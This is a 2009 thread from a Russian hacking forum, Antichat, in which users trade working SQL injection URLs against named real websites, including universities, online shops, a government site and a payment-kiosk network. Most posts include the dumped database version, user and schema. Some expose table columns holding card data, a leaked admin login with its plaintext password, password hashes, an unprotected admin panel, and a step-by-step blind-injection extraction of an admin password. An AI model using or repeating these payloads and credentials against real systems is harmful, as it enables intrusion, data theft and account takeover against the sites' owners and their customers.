ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7931  
Старый 20.02.2009, 11:45
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

georgiasouthern.edu
Цитата:
http://news.georgiasouthern.edu/press-release.php?nid=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Последний раз редактировалось jokester; 20.02.2009 в 11:57.. Причина: Northwestu.edu боян
 
Ответить с цитированием

  #7932  
Старый 20.02.2009, 14:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.angelosoft.ro/laptop-fujitsu-siemens-esprimo-mobile-v6535-core-duo-t3200-200ghz-15434-2gb-160gb-dvd-p-4725+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),user())--%20.html?osCsid=ffde33f340450de06bae3b47a148caf2




Database Version: 5.0.67-community
Database name: angeloso_osc2@localhost
User name: angeloso_osc2


tables
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, address_book, address_format, banners, banners_history, cache, categories, categories_description, configuration, configuration_group, counter, counter_history, countries, currencies, customers, customers_basket, customers_basket_attributes, customers_info, customers_searches, customers_to_extra_fields, cuvant_cheie, extra_fields, extra_fields_info, geo_zones, languages, manufacturers, manufacturers_info, newsletters, orders, orders_products, orders_products_attributes, orders_products_download, orders_status, orders_status_history, orders_total, products, products_attributes, products_attributes_download, products_description, products_extra_fields, products_notifications, products_options, products_options_values, products_options_values_to_products_options, products_to_categories, products_to_products_extra_fields, reviews, reviews_description, sessions, specials, specials1, tax_class, tax_rates, tmp_tax_rates, whos_online, zones, zones_to_geo_zones

column orders
customers_city, customers_postcode, customers_state, customers_country, customers_telephone, customers_email_address, customers_address_format_id, delivery_name, delivery_company, delivery_street_address, delivery_suburb, delivery_city, delivery_postcode, delivery_state, delivery_country, delivery_address_format_id, billing_name, billing_company, billing_street_address, billing_suburb, billing_city, billing_postcode, billing_state, billing_country, billing_address_format_id, payment_method, cc_type, cc_owner, cc_number, cc_expires, last_modified, date_purchased, orders_status, orders_date_finished, currency, currency_value

Последний раз редактировалось Gorev; 20.02.2009 в 19:32..
 
Ответить с цитированием

  #7933  
Старый 20.02.2009, 17:38
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.playground.ru
Для любителей острых ощущений=)))

Цитата:
http://www.playground.ru/games/-gta_4'+union+select+1,2,3,concat_ws(0x3a,user(),da tabase(),version()),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20+--+
p.s. вывод в адресной строке
 
Ответить с цитированием

  #7934  
Старый 20.02.2009, 19:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.brainzcomputers.ro/index.php?page=detalii_video&chipset=ATI&id_produs =-38+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat _ws(0x3a,version(),database(),user()),0x71),0x71), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*




Database Version: 4.1.11-Debian_4sarge8-log
Database name: ccd_brainz
User name: ccd_brainz@localhost

Последний раз редактировалось Gorev; 20.02.2009 в 19:34..
 
Ответить с цитированием

  #7935  
Старый 20.02.2009, 20:33
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14--
Database Version : 4.1.22-community-n
Database name : viewtrak
User name : view_www@viewtrak-apps.viewtrak.com


админ :

Код:
http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat_ ws(0x3a,user_ name,password),6,7,8,9,10,11,12,13,14+from+users--
Код:
admin:admin4viewtrak
админка без авторизации:

Код:
 http://www.viewtrak.com/admin/en/ index.php
так же в ней можно добавлять файлы

------------------------------------------------------------#
Код:
http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat_ws(0x3a,version(),database(), u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 5.0.37-log
Database name : cite
User name : citedbo@localhost


админы:

Код:
http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat _ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+account--
Код:
Candy:$1$4iOeog5p$te/NM9ZmknZbtV.uSHFcr1
Bella:$1$rJdba229$9YqG3IApT4Ox9XHwdsgxL/

Последний раз редактировалось f1ng3r; 20.02.2009 в 21:10..
 
Ответить с цитированием

  #7936  
Старый 20.02.2009, 21:51
Parserian
Новичок
Регистрация: 19.01.2009
Сообщений: 15
Провел на форуме:
31493

Репутация: 13
По умолчанию

Код:
http://spotters.net.ua/file/?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(concat_ws(CHAR(58),CHAR(58),CHAR(58),CHAR(58),user(),database(),version())),19,20,21,22,23
вывод в строке заголовка
user - spotters_spot@apollo
db - spotters_spot
version - 4.1.22-log
 
Ответить с цитированием

  #7937  
Старый 20.02.2009, 21:54
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

одна скуля, но интересная

Недвижимость в Испании :: Costa Real
Код:
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+concat(version(),0x3a,user(),0x3a,database()),222,333,444,555,666--
вывод - смотрим исходный код

user(): costareal.info@10.0.0.13
database(): costareal
version(): 5.0.32-Debian_7etch6-log

PR=4
тИЦ=40

т к 5-ая ветка читаем таблицы
Код:
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+table_name,222,333,444,555,666+from+information_schema.tables--
дальше сами.

Последний раз редактировалось z00MAN; 20.02.2009 в 21:56..
 
Ответить с цитированием

  #7938  
Старый 21.02.2009, 00:36
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.drumspeech.com известный сайт барабанщиков=)

таблица с юзерами:

Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),1,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),2,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),3,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),4,1))=114 r
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+table_name+FROM+information_schema. columns+WHERE+column_name+like+char(37,108,111,103 ,105,110,37)+limit+2,1),5,1))=0
колонка с паролями:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),1, 1))=112 p
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),2, 1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),3, 1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),4, 1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),5, 1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),6, 1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+2,1),7, 1))=0
колонка с логинами:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),1, 1))=108 l
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),2, 1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),3, 1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),4, 1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),5, 1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+column_name+FROM+information_schema .columns+WHERE+table_name=0x75736572+limit+1,1),6, 1))=0
админ:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),1,1))=11 9 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),2,1))=10 1 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),3,1))=98 b
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),4,1))=10 0 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),5,1))=11 1 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),6,1))=10 3 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+login+FROM+user+limit+0,1),7,1))=0
его пароль:
Цитата:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),1,1))=1 22 z
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),2,1))=9 7 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),3,1))=1 10 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),4,1))=1 17 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),5,1))=1 15 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),6,1))=1 15 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),7,1))=1 05 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(sub string((SELECT+passwd+FROM+user+limit+0,1),8,1))=0
drumnet.ru Ещё один известный сайт барабанщиков)
Цитата:
http://drumnet.ru/viewevent.php?id_pub=-99999+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6+--+
юзер - z49030_drumnet@77.221.130.14
бд - z49030_drumnet
версия MySQL - 5.0.51a-12-log
 
Ответить с цитированием

  #7939  
Старый 21.02.2009, 08:46
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

carc.jo pr 6

Код HTML:
http://www.carc.jo/pages_en.php?type=page&id=-1+union+select+concat_ws(0x3a3a,version(),database(),user())

5.0.67-community-log::carcgov_marka::carcgov_marka@localhost

http://carc.jo/admin/ - админка basic
shonenjump.com pr 5

Код HTML:
http://www.shonenjump.com/news/contest/winners/index.php?id=-5+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5

5.0.45-Debian_1ubuntu3.4-log::sj_cms::shonenjump@vpersuadertron
 
Ответить с цитированием

  #7940  
Старый 21.02.2009, 09:12
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Сеть информационно-платежных киосков "Мгновенно"

Код:
http://www.mgnoveno.ru/index.php?p=news&act=more&news_id=102+and+ascii(substring((select+1+from+user+limit+1),1,1))%3E1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ